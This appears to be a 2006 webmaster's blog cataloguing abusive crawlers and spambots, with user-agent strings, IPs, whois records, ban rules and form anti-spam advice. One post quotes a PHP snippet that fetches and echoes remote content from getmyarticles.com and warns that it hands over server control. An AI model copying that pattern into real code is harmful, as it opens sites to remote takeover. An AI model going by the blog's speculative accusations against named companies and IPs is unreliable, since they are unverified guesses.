Dec 23, 2006

praguomi/5.0 spam bot

praguomi/5.0 (http://somespam; u; http://same spam; http://spam; rv:1.7.12) gecko/20050915 firefox/
80.227.0.153

This bot tries to write spam links inside your useragent stats

Dec 18, 2006

mozilla/5.0 (000000000; User agent all Zeros

mozilla/5.0 (000000000; 0; 000 000 00 0; 00) 0000000000000000000 0000000 0000 000000 000000000000
84.176.234.188 p54B0EABC.dip.t-dialin.net


Anyone else seen this?

Is this some strange bot or is someones proxy changing all letters to zeros?

plano.mcafee.com Is this a bot?

mozilla/4.0 (compatible; msie 7.0; windows nt 5.2; .net clr 1.1.4322; .net clr 2.0.50727)
All Hits From plano.mcafee.com 205.227.137.1


So is this a bot? If so whats it doing?




[IPv4 whois information for 205.227.137.1 ]
[whois.arin.net]
OrgName: Level 3 Communications, Inc.
OrgID: LVLT
Address: 1025 Eldorado Blvd.
City: Broomfield
StateProv: CO
PostalCode: 80021
Country: US

depspid/5.07; +http://about.depspid.net) abuse

mozilla/4.0 (compatible; depspid/5.07; +http://about.depspid.net)
70.109.76.129 pool-70-109-76-129.hag.east.verizon.net

This bot doesnt take no for an answer it hammers pages over and over when it gets a error.

Website is another startup. Only hits we have seen are from hag.east.verizon.net

Both this IP and the bot have been banned.

Dec 17, 2006

Do you have a robots problem?

The scale of the robots problem largely depends on the type of website as well as the type of content it offers. The following pointers are consistent with robot activity.

· Large numbers of requests from a single IP address or a range of IP addresses within the same subnet (i.e. the first three numbers of the IP address are identical).

· Large numbers of requests for database driven content compared to the rest of the website.

· Many requests made from browsers that do not support ASP Sessions.

· Lots of and increasing numbers of website visitors, but no corresponding increase in transactions (e.g. sales!).

· Large numbers of spam or automated requests being generated from online forms.

See full story here.

Windows Live caught ignoring robots.txt

I have for almost a year banned robots from indexing cgi-bin files windows live is still showing links to my banner rotation software complete with a cache.

This is a direct violation of the robot.txt standard.


Also as in the last post the formatting of the windows live search results is confusing users because only the title is hot linked and the url is not hot linked making it very inviting to click on the cache link.

Dec 15, 2006

Windows Live Cache abuse confusion

I am starting to see users newbies that are trying to surf sites using the windows live cache instead of the website links.

What happens is that they are trying to submit orders and use the site by the cache and it gets detected as trackback spam due to the unusual referrer.

When I tried to warn the users to come to my website to use it I discovered that they can not tell my website from the windows live cache due to poor formatting of the Windows live screens and links. They have no ideal what they are doing or what the problem is.

Never had this problem with google most likely due to it being a smaller font link above the website link. Only solution I can see is to not allow msn to cache.

META NAME="msnbot" CONTENT="nocache"

It ignores the private cache command.
META HTTP-EQUIV="CACHE-CONTROL" CONTENT="PRIVATE"

Dec 10, 2006

EBAY Bot what is it doing?

mozilla/5.0 (windows; u; windows nt 5.0; en-us; rv:1.8.0.7) gecko/20060909 firefox/1.5.0.7
216.113.181.67


I have been watching this bot it hits 3 of my incomming pages every few days and gets a error but it keeps trying ever few days.

Perhaps this thing is scrapping our sites to see what content we have and then using those keywords google advertising.

Or perhaps its looking for people saying bad things about EBAY and Paypal like
paypalwarning.com
paypalsucks.com
ebaysucks.com/

yoono.com new bot

mozilla/5.0 (compatible; yoono; http://www.yoono.com/)
193.110.140.148

This site has a bookmark sharing service and its not clear what this bot is doing.
It might be atempting to verify the links.

Anyway its a new bot that hit here this week.

Dec 8, 2006

Nedstat goes nuts. Sets cookie FRQSTR on your domain.

A lot of us have used nedstats since the 90s well I just started seeing the cookies coming from my domain that my software was not setting and discovered that nedstat got bought out and is inserting popups on some websites.

The site has found out some way to set the following cookies on your domain.

FRQSTR=
WIDYMD=
KIDYMD=
Its not clear if they can read back a cookie from your domain. I dont think they can, it may just be a bug. I dont know but if you have any nedstat code on your sites you need to remove it because something strange is going on.

Here is how to add a link on your site to display all the cookies your site has set.

Display this sites cookies

You create this by creating a link to.
javascript:alert(document.cookie);

voilabot abuse

mozilla/4.0 (compatible; msie 5.0; windows 95) voilabot beta 1.2 (http://www.voila.com/)
81.52.143.15 natcrawlbloc01.net.m1.fti.net

This bot has been in my ban list and robots.txt reject list for some time but it wont go away it ignores robots.txt and it ignores the errors it gets when it tries to load pages.

Adding it to the deny ip list.

deny from 81.52.143.15

Dec 5, 2006

outboundrequest.com abuse

POE-Component-Client-HTTP/0.65 (perl; N; POE; en; rv:0.650000)
64.239.7.216 ns2.outboundrequest.com
POE-Component-Client-HTTP/0.65 (perl; N; POE; en; rv:0.650000)
64.65.13.36 garnet.il.outboundrequest.com


This is a known bad useragent. And outboundrequest.com is a real domain with no website. Updated bots changed ips.

OrgName: Interland, Inc.
OrgID: INTD
Address: 101 Marietta Street
City: Atlanta
StateProv: GA
PostalCode: 30039
Country: US


Added to domain ban

outboundrequest.com,Abusive bots

stage1.answers.com bot

mozilla/4.0 (compatible; msie 5.5; windows nt 5.0)
64.34.176.218 stage1.answers.com


This must be a bot from answers.com however its using a fake useragent.

Since answers has nothing on its site about running a bot its blocked.

twiceler Expermental bot

twiceler www.cuill.com/twiceler/robot.html
64.62.136.205


Hurricane Electric
OrgID: HURC
Address: 760 Mission Court
City: Fremont
StateProv: CA
PostalCode: 94539
Country: US

This bot just can not take no for a answer. It keeps trying to scan my site.

Says it will respond to
User-agent: cuill
Disallow: /

in robots so I am going to try that.

mozilla/0.6 beta (windows) is a bot

mozilla/0.6 beta (windows)
66.36.229.205

This useragent has bee verified as a bot.

It was orginaly netscape before tables and no one would be using that browser anymore.

Dec 3, 2006

crlptp01 = Colgate University fake domain name

mozilla/5.0 (macintosh; u; ppc mac os x; en) applewebkit/418.9.1 (khtml- like gecko) safari/419.3
crlptp01 149.43.116.39

Colgate University
OrgID: COLGAT-2
Address: 13 Oak Drive
City: Hamilton
StateProv: NY
PostalCode: 13346
Country: US

Why would Congate Univ have a fake domain connected to one of its IPS?

nslookup 149.43.116.39
Canonical name: crlptp01
Aliases: dfbnt351

Dec 1, 2006

Block list updated 11-30-06

Block list has been updated.
Click on update link

Ok to use this you need M&M Autoban installed. DOCS are in the zip file.

Or you can use the data on your own scripts.

Nov 30, 2006

; Windows NT; ....../1.0 What is this

Mozilla/4.0 (compatible; MSIE 4.0; Windows NT; ....../1.0 )
63.80.56.36

Another fake browser detected.


OrgName: UUNET Technologies, Inc.
OrgID: UU
Address: 22001 Loudoun County Parkway
City: Ashburn
StateProv: VA
PostalCode: 20147
Country: US

Nov 29, 2006

christiandnsonline.com

NO AGENT-
72.36.205.10 sql3.christiandnsonline.com

Not sure what this one is

Nov 28, 2006

anothrrobot (http://www.anothr.com) RSS ABUSE

anothrrobot (http://www.anothr.com)
60.191.17.90

The above IP is banned as a Single-stage open SMTP relay or HTTP Proxy See here

anothrrobot (http://www.anothr.com)
218.72.35.200 200.35.72.218.broad.hz.zj.dynamic.163data.com.cn

The above IP is also banned as a spammer see here

Located in Shanghai ShangHai china

This RSS Robot is said to read your rss feeds and then push them to the end user. But It keeps on reloading the rss feed over and over and over.

Example of abuse. I set my RSS feed Time To Live (TTL) to no more than 1 load per day but this bot is loading the feed every min and ignoring the TTL.

So its banned.
After banning I am seeing hits from another dynamic China IP address. I dont think this is a real Feed service.

Domain name: anothr.com

Registrant Contact:
Zheng
Zheng XY cnblog@gmail.com
13501863736 fax: 13501863736
15L,Huamin Building, No.728,Yanan Xi Rd.
Shanghai ShangHai 200051
CN

Administrative Contact:
Zheng XY cnblog@gmail.com
13501863736 fax: 13501863736
15L,Huamin Building, No.728,Yanan Xi Rd.
Shanghai ShangHai 200051
CN

Technical Contact:
Product Team diy@corp.myrice.com
64677272 fax: 64727880
Room 306,MingYuan Tower,1199 Fu Xing Road (M)
Shanghai Shanghai 200031
CN

Billing Contact:
Product Team diy@corp.myrice.com
64677272 fax: 64727880
Room 306,MingYuan Tower,1199 Fu Xing Road (M)
Shanghai Shanghai 200031
CN

DNS:
ns.myricedns.com
ns5.cnmsn.net

Created: 2006-03-16
Expires: 2008-03-16

outfoxbot/0.5

outfoxbot/0.5 (for internet experiments; http://; outfoxbot@gmail.com)
All Hits From 60.191.80.48

This bot runs on a IP banned for sending out china spam.

It is a unknown bot. Likely a email harvestor

Nov 26, 2006

keymachine.de abuse probes

mozilla/4.0 (compatible; msie 6.0; windows nt 5.2; win64; amd64)
87.118.103.185 ns2.km20935-07.keymachine.de

Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
84.19.188.68 ns.km21901-01.keymachine.de

I show this useragent only being used by keymachine.de not users.
mozilla/4.0 (compatible; msie 6.0; windows nt 5.0; avant browser [avantbrowser.com]; hotbar 4.4.5.0)
62.141.52.139 ns.km23144-19.keymachine.de

I show this useragent only being used by keymachine.de not users.

mozilla/5.0 (windows; u; windows nt 5.0; en-us; rv:1.7.5) gecko/20050207 firefox/1.0.1
62.141.52.139 ns.km23144-19.keymachine.de

87.118.106.4 ns.km23108-04.keymachine.de



keymachine.de is at it again. Goes straight to my contact form then back to the homepage then back to the contact form.

I few mins later it shows up on one of my PHP nuke sites trying to load a module that I do not run. After 14 tries it gave up and started on the homepage. After 6 tries it gave up on the homepage.

keymachine.de should be banned from all sites.



Listed in rfc-ignorant.org

Nov 25, 2006

converacrawler/0.9d 7-9745.san2.attens.net bot

converacrawler/0.9d (+http://www.authoritativeweb.com/crawl)
63.241.61.7 7-9745.san2.attens.net

This bot came in and refused to take no for a answer it tried to load every page I had. So its clear that it didn't spider my site to get those links it got them from google or somewhere else.

converacrawler was orginaly banned as a email harvestor but it now looks like a real search site at www.govmine.com.

They claim you can add this to robots.txt.

User-agent: ConveraCrawler
Disallow: /

Nov 24, 2006

www.exalead.com Violates robots.txt

The www.exalead.com website has a robot that comes in and ignores your robots.txt file and takes a snapshot of your website and then post it as a thumbnail on its site.
It doesn't matter if you do block all images from bots like this.

User-agent: *
Disallow: /images/

Exalead.com refuses to abide by the commands in robots.txt.

abuse from thenewpush.com

Mozilla/4.0 compatible
64.92.199.43 host-64-92-199-43.thenewpush.com
Mozilla/4.0
64.92.199.42 host-64-92-199-42.thenewpush.com

64.92.199.60 host-64-92-199-60.thenewpush.com

Ran into this probe today from several IPS on thenewpush.com Looks like they were testing out useragents on diffrent IPS.

Nov 23, 2006

66.199.236.106 duns.dunnaonline.com spamer

mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)
66.199.236.106 duns.dunnaonline.com
mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)

dunnaonline.com is the leading provider for data for direct marketing campaings


Humm why would a direct marketer be sending out a bot that fakes google and atempts to post spam into our scripts.

It looks like this is a spammer site and they are getting into blog spam?

the website won't load but a cache is still stored in google

Update this bot keeps trying scripts that dont exist.

PHPNuke Atacker Bots

Have been seeing a lot of bots hitting my phpnuke sites its not clear why they are trying to load the following files since they are not used in the current version. And have never been located on my server.

The files they are atempting to post to are
logon.php
profile.php
posting.php

I have setup a autoban on these files to track the atacks here will be the results of what I find.

Its now clear what this is. This is an atack on the phpBB forum software that PHPNUKE uses problem is that this version is modified and the atack wont work on PHP NUKE. But that doesnt stop the robots atacks.

IPS of phpBB hackers

66.199.236.106 duns.dunnaonline.com <- worst abuser
213.186.116.169 utel10.in.ua
84.252.152.169 poltawa.com
75.126.18.154 server1.domishko.ru
81.177.24.80
81.177.4.43
66.230.154.154
66.230.161.122
222.33.248.126

Nov 22, 2006

Exalead image theft

Exalead Snapshots your site and lists it in its search system. It also tries to hot link all your images in a page view window. Sites like mine using hotlink protection will display a image theft notice when they do this.

I thought I has stoped this snapshot bot without stoping its crawler but they have again changed the useragent for it.

See here and here for more.

block useragents.

NG/2.0,Image crawler
NG/4.0,image crawler

Robot does not comply with simple basic robots.txt commands to not load images.

User-agent: *
Disallow: /images/

Nov 21, 2006

nodomaintransfer abuse nodomaintransfer27.com is back

66.135.34.11 nodomaintransfer18.com
66.139.75.163 nodomaintransfer19.com
66.139.76.245 nodomaintransfer21.com
66.139.77.214 nodomaintransfer22.com
66.135.33.49 nodomaintransfer25.com
64.34.166.88 nodomaintransfer27.com


Will show up as a domain nodomaintransfer??.com with the ?? being replaced with a number. This is a guestbook spammer.

It is now suspected that they are registering throw away domains so when they get caught they can just switch to a new one. I have seen the above ones if you have seen other combos please post them.


On another note its odd that we also see Singapore peepsurf running a proxy on
nodomaintransfer21.com now suspected to be connected.

domain ban
nodomaintransfer,Gustbook Spammer

sumitbot_hansrajbot RufusBot Submit Bot spammer

sumitbot_hansrajbot (sumitbot_hansrajbot; http://64.124.122.252/feedback.html)
64.124.122.228.gw.xigs.net 64.124.122.228

IP has been flagged as a spammer. Also see SPAMBAG on 64.124.122.228

RufusBot
Why are we crawling?
We crawl the web towards the goal of developing a new kind of index/search tool that will bring substantial and previously unavailable exposure to websites. We're in "stealth mode" for the next few months for business reasons, but watch this page for more details on our product.


Yea same old story. But if its true why don't you have a real domain name and why are you running on a ip flagged as a source of spam. Get a real hosting account with a real domain and someone might believe you.

We identify ourselves with the name RufusBot in our crawls

The code below can be used to disallow access to all parts of your site just for our bot.
User-Agent: RufusBot
Disallow: /


Sorry that statment is false. It identifies itself as The Submit Bot in crawls. Submitting what? Spam?


Its not clear what gw.xigs.net is. Is it a ISP or hosting company.

scspider/0.2 64.28.178.66

scspider/0.2
64.28.178.66

This bot is using a IP flagged as a spammer. This unknown bot is banned.

blogbot/1.0 Locus.CS.UCLA.EDU 131.179.64.248

blogbot/1.0 (ucla cs dept contact:kcsia@cs.ucla.edu)
All Hits From Locus.CS.UCLA.EDU 131.179.64.248

Unknown what this bot is for so its banned.

webbot.org www.webbot.ru webbot/0.1

mozilla/5.0 (compatible; webbot/0.1; http://www.webbot.ru/bot.html)
88.151.114.38 crawler38.us.webbot.org
88.151.114.36 crawler36.us.webbot.org


This bot fell right into bot traps and then kept trying to spider all my sites.

It is a ru robot

Banned due to abuse. Not following robots.txt

Nov 17, 2006

72.20.99.48 c08.ba.accelovation.com www.accelobot.com scrapper

400 Required header 'Accept' missing
Mozilla/5.0 (compatible; heritrix/1.8.0 +http://www.accelobot.com)
72.20.99.48 c08.ba.accelovation.com

My mission is helping companies mine the online world. I seek innovators like you, who provide insights into unmet needs, trends, and market activity. Using Accelovation Market Discovery™ software (MDS), I help automate market research, allowing companies to more effectively and economically identify and take advantage of new opportunities for innovation and growth.


This bot was caught hammering my site and getting blocked on all PHP pages by BB.
Recomend adding this robot to your robots file.

Case Studies
Major consumer packaged goods companies use Accelovation to identify new innovations that will become their next billion dollar businesses.
Multiple Fortune 500 chemical companies use Accelovation to discover new markets for existing capabilities, while keeping tabs on the competition.
A Fortune 100 telecommunications company identifies patent infringers to win multi-million dollar awards via automated Accelovation searches.


Really? Stealing my content so some big company can make money off of it is theft.
Helping big companies find ideals that they can take from us and patent is theft.
And worse yet once they take your ideals and patent them they come back and sue you for patent theft.

BANNED.

Nov 10, 2006

Running getmyarticles.com remote scripts

elseif(intval(get_cfg_var(’allow_url_fopen’)) && function_exists(’file’)) {
if($content = @file(”http://getmyarticles.com/engine.php?”.$QueryString))
echo @join('’, $content);
}
elseif(function_exists(’curl_init’)) {
$ch = curl_init (”http://getmyarticles.com/engine.php?”.$QueryString);
curl_setopt ($ch, CURLOPT_HEADER, 0);
curl_exec ($ch);


Take care. The site getmyarticles.com will not answer my questions about the security problems.

Beware of the PHP script provided by getmyarticles.com that they want you to put on your server. It allows them to take total control of your server. Instead of pulling content and displaying it on your server. It loads the script from the remote server and then runs it.

This is a huge security violation. Then can spam from your server or run bots or do anything they want. They will control your server.

Until they release a real script that just prints the content to the screen so it can not be executed or answer emails about why they wont change it do not use that service.




More testing on this shows that it looks like the remote content can be loaded then scanned for any php codes before its displayed but you will have to write your own script to do this. If anyone else wants to help test some safe scripts using this service let me know. Need to make sure we know all the exploits we need to scan for.
Scanning for
should prevent any php codes from running. Any more ideals?

Nov 9, 2006

Website Contact form How the robots atack

If you have a website you likely have a contact form so you do not have to list your email address.

The rise of blogs has also created roving spambots that post to comment forms. They are atempting to find blogs and guestbooks but they are also posting to our website contact forms.

Here is an example of a robot that came from
70.87.63.146 92.3f.5746.static.theplanet.com

The robot read the form from my html page copied all the form fields including the hidden ones. It then submitted all the proper filelds leaving the ones not used blank. It added data to teh name and city.

The city field contained 'k o s t a n a y' (Spaces added) The name contained a random name. It is beleived that this was a test message designed to post to everything and then com back a month later and scan google to find out what sites end up displaying the test phrase which in this case is the city.

Once it finds out which sites it got into it will then come back and post its spam message.

Strange thing about this robot is that it has a bug. It doesnt understand your reset or clear button so it tries to submit that field also like this.
reset=Reset form

So if you find your reset filed being posted to your form you should reject the entry.

Posting a key field or password field won't help because it will read the field and repost it. However after detecting this bot I changed my key and found that its still trying to post under the old key so it reads your key once and then doesn't do any updates.

In order to protect your forms from this bot I recomend using php to create your form page and then post the current date as a hidden field along with a rotating key. Then test for these when the data is submitted. This type of bot may pass the first test but none of the ones after that. In fact it may not even pass the first test it it doesnt post on the same day it scans.


For my forms that are on html pages I have changed my php submission form. It now displays a page asking the user to press submit again to verify the post. This inserts another date and key code in the input that the robots can not duplicate. Not only do they not know what the key will be before time but they would have to submit the data twice with diffrent keys to get in, something they are not programmed to do.

The verify button takes the place of the capata and works just as good so far.

Nov 8, 2006

Google IP 72.14.194.33 Falls into bot traps

mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; sv1; .net clr 1.1.4322)
72.14.194.33

This IP is owned by Google and is used by Google Web Accelerator

The problem is that google is not following the robots.txt file so its falling into bot traps.

Or if its not Google Web Accelerator falling into traps then people are using the ip as a proxy.


Question is what to do about this?

Nov 7, 2006

83.206.210.131 billythekid.ivelem.net

403 A User-Agent is required but none was provided
83.206.210.131 billythekid.ivelem.net

This one also has no useragent not sure what its doing.

render-dream.com

bad-behavior 403 A User-Agent is required but none was provided
211.218.151.198
85.214.32.180 render-dream.com

These 2 came in at the same time and is the same bot from 2 ips.

Its not clear what render-dream.com is the website gives a error and I can find no record in google,

Nov 6, 2006

38.113.234.180 crawl1.cosmixcorp.com

cosmixcorp.com Is a Health search sytem

cfetch/1.0
38.113.234.180 crawl1.cosmixcorp.com

voyager/1.0
38.113.234.180 crawl1.cosmixcorp.com

They have started changing useragents lately. The site says its using the Voyager useragent.
What is your crawler's HTTP user-agent string?

voyager/1.0


Thats really strange since it keeps using cfetch/1.0 most of the time.
I had been banning them by ip but will try the robots file again.


Add this to robots.txt
User-agent: voyager
Disallow: /

tm.net.my

60.48.201.70 tm.net.my

This is a ISP in Telekom Malaysia It creates a lot of guestbook spam and we had banned. it It will be unbanned as an experment to see what we get.

Jakarta Commons

See last post this one came uin using Jakarta Commons and was blocked by BB so they started changing IPS I guess thinking I was blocking them by IP?

Here is a list the first one had a longer Useragent

Jakarta Commons-HttpClient/3.0.1 UP.Link/6.2.3.21.0
12.25.203.39 babylon.openwave.com

Jakarta Commons-HttpClient/3.0.1
203.144.144.164 proxy.asianet.co.th
203.187.16.218 u16-218.u203-187.giga.net.tw
80.50.82.90
203.144.144.164 proxy.asianet.co.th
203.187.16.218 u16-218.u203-187.giga.net.tw
80.248.8.43
85.46.232.188 host188-232-static.46-85-b.business.telecomitalia.it
213.91.192.5 5_192.btc-net.bg
203.144.144.164 proxy.asianet.co.th
209.203.227.139 exchange.soundcontainer.com
217.40.239.201 host217-40-239-201.in-addr.btopenworld.com
203.187.16.218 u16-218.u203-187.giga.net.tw
203.187.16.218 u16-218.u203-187.giga.net.tw
80.237.140.233 proxy77.net
202.158.165.82
211.218.151.198
222.243.204.210
218.98.221.108
80.76.55.21

Still comming ip list updated,

Kind of looks like either he has accounts on all of these or the computers are compromised or they are some type of proxy...

400 Header 'Connection' contains invalid values

400 Header 'Connection' contains invalid values
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.73.184.24 84-73-184-24.dclient.hispeed.ch

This bot or hacker dont know which hit my site and was stoped by BB.
So it starts changing IPS still uses the same useragent and headers. Whats strange is all the IPS its using.

Here is a list.

84.5.129.72
68.56.7.53 c-68-56-7-53.hsd1.fl.comcast.net
12.227.189.4 12-227-189-4.client.mchsi.com
72.56.124.102 CPE0011e6ee1575-CM0011e6ee1574.cpe.net.cable.rogers.com
84.156.107.136 p549C6B88.dip.t-dialin.net
217.249.174.68 pD9F9AE44.dip.t-dialin.net
62.178.171.33 chello062178171033.5.12.vie.surfer.at
83.184.189.61 d83-184-189-61.cust.tele2.it

Also see next post about similar action using useragent 'Jakarta Commons'

Nov 3, 2006

84.244.8.86 pejantantangguh-a.biz

84.244.8.86 pejantantangguh-a.biz
SE - Sweden
What kind of domain is this?
Its website is blank and its robot visits with no useragent.

tmhaos04.imsbiz.com

mozilla/4.0 (compatible; msie 5.01; windows nt)
210.87.251.107 tmhaos04.imsbiz.com

This one is a spammer the IP is on the spam blocklist.

What gave him away is the windows nt useragent. This is invalid.

s7.buzzlogic.com

Posted: October 31 2006 Post subject: suspicious link in my stats
--------------------------------------------------------------------------------

Does anybody have a clue what this is? I've had is show up three times now. Obviously, the entry link and exit link have nothing to do with my site.

Here is the stat info

2
October 31st 2006 16:42:51
7 seconds
Konqueror 3.5
Linux
1600x1200 Returning Visits:

Referring URL: 0
Location: Florida, Miami, United States
host name:s7.buzzlogic.com (64.34.246.44)
No referring link



A check on this site buzzlogic shows that its a snoop bot for corps to check on who is talking about them. Another snoop bot.

Oct 27, 2006

php version tracker

php version tracker (http://www.nexen.net/phpversion/bot.php)
tabarnak.nexen.net 217.174.203.41

PHP version tracker runs continuously. It doesn't request anything more than HEAD from the web site (i.e., http://www.nexen.net/, GET /), and do not recurse into folders. It runs from differents IP, which are not stable.



Everyone knows the famous PHP phpinfo(), which provide the programmer with invaluable information about his server configuration and set up. This is a useful tool as soon as one get a new server, and it is also a tool to talk with any administrator.

Yet, after usage, it is usually recommended to remove it, or to restrict its access to few people. Indeed, phpinfo may be dangerous by itself : in other times, it was even flawed with XSS injections. Even when secured, phpinfo() publish information about your architecture, and it is always recommended to keep it from privy eyes.

Sadly enough, the common habit to set up a phpinfo page on every web site is now so widely spread that even search engines are starting to pick them up : there are literally thousands of phpinfo indexed on Yahoo and Google. Just hit a search with the words 'phpinfo()' 'GoogleBot' and



SO this bot reads the phpinfo script that you forgot to remove and compiles all your servers info.

customhostingservers.com guestbook spammers

Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)
1530-29-1.customhostingservers.com 216.32.76.202

Looks like this is a heavy guestbook spammer.

The website has nothing but a image file that gives a address to report abuse. Is this a real hosting company? If so why doesn't it have a real website?

I am banning this domain based on the guestbook spamming I am seeing on other sites.

schibstedsokbot Just what is this

schibstedsokbot (compatible; mozilla/5.0; msie 5.0; fast freshcrawler 6; +http://www.schibstedsok.no/bot/)
sch-fast-se-crawl02.osl.basefarm.net 81.93.168.72
sch-fast-se-crawl04.osl.basefarm.net 81.93.168.74


The website this bot says it comes from doesn't exist so what is this bot.

Also basefarm.net doesn't have a website.

Oct 26, 2006

clarissa.empyreum.com bot

silk/1.0
clarissa.empyreum.com 194.213.194.206

A look at the sites webpage at empyreum.com says.

Typical performance of the Crawler technology is 1 - 5 thousands documents (www pages) per second on a single conventional server with UNIX operation system.

Some internet resources perform real-time user agent behaviour analysis in order to identify automated crawler systems based on request delay measuring and / or traversing method detection.

EMPYREUM Crawler technology therefore supports many advanced techniques including virtual user emulation allowing customer to monitor selected public information silently



Thats really something to brage about a bot that breaks into yuor site and pretends to be a browser. Nothing on this site says why they are spidering me so this domain is added to the domain ban.

Also I have not yet found out where silk comes from but it may also be banned.

209-103-237-195.excel.net spambot?

mozilla/4.0 (compatible ; msie 6.0; windows nt 5.1)
209.103.237.195 209-103-237-195.excel.net

This bot fell right into the bot traps. Its also blocked by BB.
Excel.net is a isp in Wisconsin, Sheboygan and Plymouth.
So this looks like a DSL line.

Have to watch this one..

pdxg1n-o.webtrends.com What is it? Scrapper?

400 Required header 'Accept' missing
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322)
63.88.212.164 pdxg1n-o.webtrends.com

Webtrends robot fakes a useragent and doesn't send the proper headers so it can not pass Bad Behaivor scanning.

From looking at the site it says nothing about a cloked robot. So what are they doing on my site?

For now based on all the text on the website about helping you get a top position it looks like they may be scraping other sites to get content to raise you in the listings this would make them a scrapper. If thats not whats going on someone explain it.

Why do they hide what they are doing?

Amazon bots dont get the point

nutchec2test/nutch-0.9-dev (testing nutch on amazon ec2.; http://lucene.apache.org/nutch/bot.html; ec2test at lucene.com)
216.182.236.46 domU-12-31-34-00-00-6A.usma2.compute.amazonaws.com

Now look here Amazon your not going to get in my site or others using that crappy bot. You need to create your own useragent with a link to a page explaining what you are doing on my site. Otherwise you will get a brick wall.

Oct 21, 2006

zippy2.cs.cornell.edu abuse

wget/1.8.2
128.84.97.129 zippy2.cs.cornell.edu

So cornell.edu why are you trying to dowload my entire website?
GET LOST!

Edacious & Intelligent Web Robot (what a joke)

Mozilla/4.0 (compatible; EDI/1.6.6; Edacious & Intelligent Web Robot; Daum Communications Corp.- Korea)
222.231.42.12

This bot can't even send the proper headers.
The website doesn't say anything about a bot.

Oct 17, 2006

mozilla/4.0 (compatible; msie 6.0; windows nt)

mozilla/4.0 (compatible; msie 6.0; windows nt) ::elnsb50::000061100320025802a00111000000000507000900000000
83.167.112.156

mozilla/4.0 (compatible; msie 6.0; windows nt) ::elnsb50::000061100320025802a00111000000000507000900000000
66.110.119.170 gauntlet.angolatelecom.com

mozilla/4.0 (compatible; msie 6.0; windows nt) ::elnsb50::000061100320025802a00111000000000507000900000000
219.153.13.45


Agent: mozilla/4.0 (compatible; msie 6.0; windows nt) ::elnsb50::000061100320025802a00111000000000507000900000000
83.167.112.156

mozilla/4.0 (compatible; msie 6.0; windows nt) ::elnsb50::000061100320025802a00111000000000507000900000000
201.21.208.95 C915D05F.poa.virtua.com.br

The above bot came in claiming to be Windows NT. Windows says no such useragent was ever built. When they were blocked they tried again using several other IPS thinking it was a ip ban.

gauntlet.angolatelecom.com is a open proxy.
virtua.com.br is identified with guestbook spamming

topicblogs/0.9 Email harvestor or scrapper?

topicblogs/0.9
72.36.205.226 226.205.36.72.reverse.layeredtech.com

topicblogs Has no real working website just a email collection system to trick you into giving them your email address.

We throw this into our list of fake startup companies running scrapper and email harvestor bots. If it was a valid bot it would have a link to a real working webpage.


Also layeredtech.com is banned for abusive bots.

Oct 14, 2006

tellusioncrawler/1.0 bot

tellusioncrawler/1.0
wildebeest.gnoos.com.au 64.34.161.44

http://www.gnoos.com.au/ looks to be some type of search system for blogs.

Oct 13, 2006

Internet Explorer 6 (MSIE 6; Windows XP) abusive bot

Internet Explorer 6 (MSIE 6; Windows XP)

The above useragent was sent by Web Scrapper +
I have tested this software and it created the above fake invalid useragent.
BB stops it dead.

Oct 12, 2006

vodka.fark.com bot

Prohibited header 'Range' present

FARK.com link verifier; see http://www.fark.com/farq/tech.shtml
207.58.150.113 vodka.fark.com

Looks like more drunk on vodka bots this time from fark.com

I don't use fark but its link checker will never verify anything because its improper headers are blocked by BB

dedicatedcentral.com abuse

mozilla/4.0 (compatible; msie 6.0; windows nt 5.1)
216.139.224.70 ip-d88be046.dedicatedcentral.com

The above bot fell right into the bot trap. And then tried to scan the other sites.

On the 15th falure it tried to submit a order for a giveaway I am running.
How strange its must be a spider with a human monitoring it.

Actual name and address removed but the address was in boston.
spam=[+city=Boston&+state=OK&+zip=02116&]

dedicatedcentral.com has no A record or website. So what is it?
| Domain Name: dedicatedcentral.com
| Created on .............Tue Jul 22 14:27:43 2003
| Expires on .............Fri Jul 22 14:27:43 2011
| Record last updated on .Tue Sep 26 17:15:13 2006
| Status .................LOCK
|
| Administrative Contact:
| DomainPeople, Inc.
| Dom Reg
| 200-550 Burrard Street
|
| Vancouver, BC
| V6C2B5, CA
| (604)6391680
| ()
| hostway-cdm@domainpeople.com
|
| Technical Contact:
| DomainPeople, Inc.
| Dom Reg
| 200-550 Burrard Street
|
| Vancouver, BC
| V6C2B5, CA
| (604)6391680
| ()
| hostway-cdm@domainpeople.com
|
| Domain servers in listed order:
| a.ns.dedicatedcentral.com 216.139.254.200
| b.ns.dedicatedcentral.com 216.139.223.11
|
| (dedicatedcentral.com)


The IP is from Texas.

OrgName: SouthWeb Ventures
OrgID: SOUTH-29
Address: 501 Waller St
City: Austin
StateProv: TX
PostalCode: 78702
Country: US

NetRange: 216.139.208.0 - 216.139.255.255
CIDR: 216.139.208.0/20, 216.139.224.0/19
NetName: SOUTHWEB-AUSTIN
NetHandle: NET-216-139-208-0-1
Parent: NET-216-0-0-0-0
NetType: Direct Allocation
NameServer: A.NS.SOUTHWEBVENTURES.COM
NameServer: B.NS.SOUTHWEBVENTURES.COM
Comment: ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE
RegDate: 2000-06-28
Updated: 2005-10-25

OrgAbuseHandle: ABUSE548-ARIN
OrgAbuseName: Abuse
OrgAbusePhone: +1-512-469-9939
OrgAbuseEmail: abuse@southwebventures.com

OrgTechHandle: NOC1501-ARIN
OrgTechName: NOC
OrgTechPhone: +1-512-469-9939
OrgTechEmail: noc@southwebventures.com


The southwebventures.com website is blank.

Because of all the above and no clear ideal why this is (is it a isp it cant be with no website) the domain will be added as an abussive bot.


dedicatedcentral.com,Unknown abusive bots

Oct 11, 2006

Guestbooks a thing of the past?

With all the spam Guestbooks have become a thing of the past because unless you are going to moderate them they will fill with thousands of spam and trackback messages.

Once your system fills up with the spam your webspace will be used up and your bandwidth will go way up as others load the huge pages of spam.
Once the search systems see you linking to this spam your page will go down in the ratings as you will be identified with the spammers. Even iof you moderate if the spam stays on your site for more than a day your domain could be damaged by it.

I switched off all my guestbooks and converted to wordpress because it has spam plugins that are mostly automated this still allows users to comment but doesnt take up all my time watching for spam.

Suggest Wordpress with Spankarma and bad behaivor.

Just post a message for your new guestbook and link to that post from your old guestbook link.


